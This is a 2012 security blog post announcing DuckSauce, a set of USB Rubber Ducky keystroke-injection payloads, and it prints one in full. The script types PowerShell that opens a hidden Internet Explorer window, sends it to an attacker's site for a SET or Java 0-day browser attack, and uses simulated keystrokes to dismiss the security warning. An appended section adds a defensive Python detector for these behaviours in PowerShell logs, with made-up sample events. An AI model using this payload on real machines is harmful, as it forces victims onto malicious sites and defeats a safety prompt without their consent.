Unall{0}cated – Gets introduced to DuckSauce

I had the luxury of introducing DuckSauce v.01 at Unall{0}cated’s August mini-con. I was glad to see that several members of the audience had brought their ducks to play around with – made for some good demos. For those of you in attendance, I left forgottensec a zip of the most current version of DuckSauce – v.01 (actually more like a 0.2, but I want to add a few more payloads before I officially release 0.2), so you should be able to download it from their file server soon. Also, for anyone with a Duck who wants their payloads included in DuckSauce, please leave a comment and I will contact you about the details – the more the merrier.

I will upload v.02 to this post once completed.

8/29/2012 update:

Having fun over at Unallocated made me want to go back and build more payloads. Having been reading about all the Java 0-day information, to include how quickly it made it into SET, I figured I would put the two together. So let’s set the scenario: you want to run SET or any other browser-level attacks – what is the one thing they all have in common? That’s right; you need to get the user to surf your malicious site. Yes, there are several ways you can do this (e.g. DNS spoofing) but I was working on Ducky payloads.. hmmmm… I wonder if you can make the duck do it. Already having a payload to modify the local host file, I wanted a little more, perhaps something that directly navigates to the page. Enter the PowerShell samples from Nishang (good stuff); I was able to leverage them to come up with a ducky payload (snippet below, to be run in PowerShell). In my lab testing, ducky payload + new SET = rock! It even answers the security pop-up for you (after all, we are the keyboard). Please remember with great power comes great responsibility – I share for informational purposes only, not for any malicious intent.

STRING $ie = new-object -comobject "InternetExplorer.Application"
ENTER
STRING $ie.visible = $false
ENTER
REM Enter URL Below for the $URL Variable
ENTER
STRING $ie.navigate("$URL")
ENTER
STRING start-sleep -seconds 3
ENTER
STRING [void] [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.VisualBasic")
ENTER
STRING [Microsoft.VisualBasic.Interaction]::AppActivate("Security Warning")
ENTER
STRING [Microsoft.VisualBasic.Interaction]::AppActivate("Security Warning")
ENTER
STRING [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
ENTER
STRING [System.Windows.Forms.SendKeys]::SendWait(" ")
ENTER
STRING start-sleep -m 500
ENTER
STRING [System.Windows.Forms.SendKeys]::SendWait("{TAB}")
ENTER
STRING start-sleep -m 750
ENTER
STRING [System.Windows.Forms.SendKeys]::SendWait("{Enter}")

The full payload along with many others will be released in Duck Sauce v.02 coming soon.
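
A defender-side check for the behaviour in the snippet above, as an added example that is not part of the original post or of DuckSauce: it correlates PowerShell script block log entries (Event ID 4104) per host and process, because each line typed into an interactive console is logged as its own script block. The event tuple layout, the 60-second window, the required-indicator set and every sample event are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviours taken from the snippet above; one regex per typed line of interest.
INDICATORS = {
    "ie_com": re.compile(r"new-object\s+-com\w*\s+\W?InternetExplorer\.Application", re.I),
    "hidden": re.compile(r"\.visible\s*=\s*\$false", re.I),
    "navigate": re.compile(r"\.navigate\s*\(", re.I),
    "focus_dialog": re.compile(r"\[Microsoft\.VisualBasic\.Interaction\]::AppActivate", re.I),
    "sendkeys": re.compile(r"\[System\.Windows\.Forms\.SendKeys\]::SendWait", re.I),
}
REQUIRED = {"ie_com", "hidden", "sendkeys"}  # hidden browser plus synthetic keystrokes
WINDOW = timedelta(seconds=60)               # assumed correlation window

def detect(events):
    """events: iterable of (iso_timestamp, host, pid, script_block_text).
    Returns sorted (host, pid) pairs where all REQUIRED indicators fall within WINDOW."""
    seen = defaultdict(dict)  # (host, pid) -> {indicator: time last seen}
    hits = set()
    for ts, host, pid, text in sorted(events):
        now = datetime.fromisoformat(ts)
        state = seen[(host, pid)]
        for name, rx in INDICATORS.items():
            if rx.search(text):
                state[name] = now
        recent = {n for n, t in state.items() if now - t <= WINDOW}
        if REQUIRED <= recent:
            hits.add((host, pid))
    return sorted(hits)

# Constructed sample events (hosts, PIDs, times and URL are made up).
SAMPLE = [
    ("2024-01-15T10:00:00", "WS-LAB1", 4120, '$ie = new-object -comobject "InternetExplorer.Application"'),
    ("2024-01-15T10:00:01", "WS-LAB1", 4120, "$ie.visible = $false"),
    ("2024-01-15T10:00:02", "WS-LAB1", 4120, '$ie.navigate("http://lab.example/")'),
    ("2024-01-15T10:00:06", "WS-LAB1", 4120, '[System.Windows.Forms.SendKeys]::SendWait("{TAB}")'),
    # Benign automation: visible browser, no synthetic keystrokes.
    ("2024-01-15T11:00:00", "WS-LAB2", 900, "$ie = New-Object -ComObject InternetExplorer.Application; $ie.Visible = $true"),
    # Same indicators spread over hours: outside the correlation window.
    ("2024-01-15T09:00:00", "WS-LAB3", 77, "$ie = new-object -com InternetExplorer.Application; $ie.visible = $false"),
    ("2024-01-15T12:00:00", "WS-LAB3", 77, '[System.Windows.Forms.SendKeys]::SendWait("{Enter}")'),
]

if __name__ == "__main__":
    print(detect(SAMPLE))
```

Matching a single line in isolation is noisy, since hidden IE automation and SendKeys each have legitimate uses; the combination inside one process within a short window is what the rule keys on.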
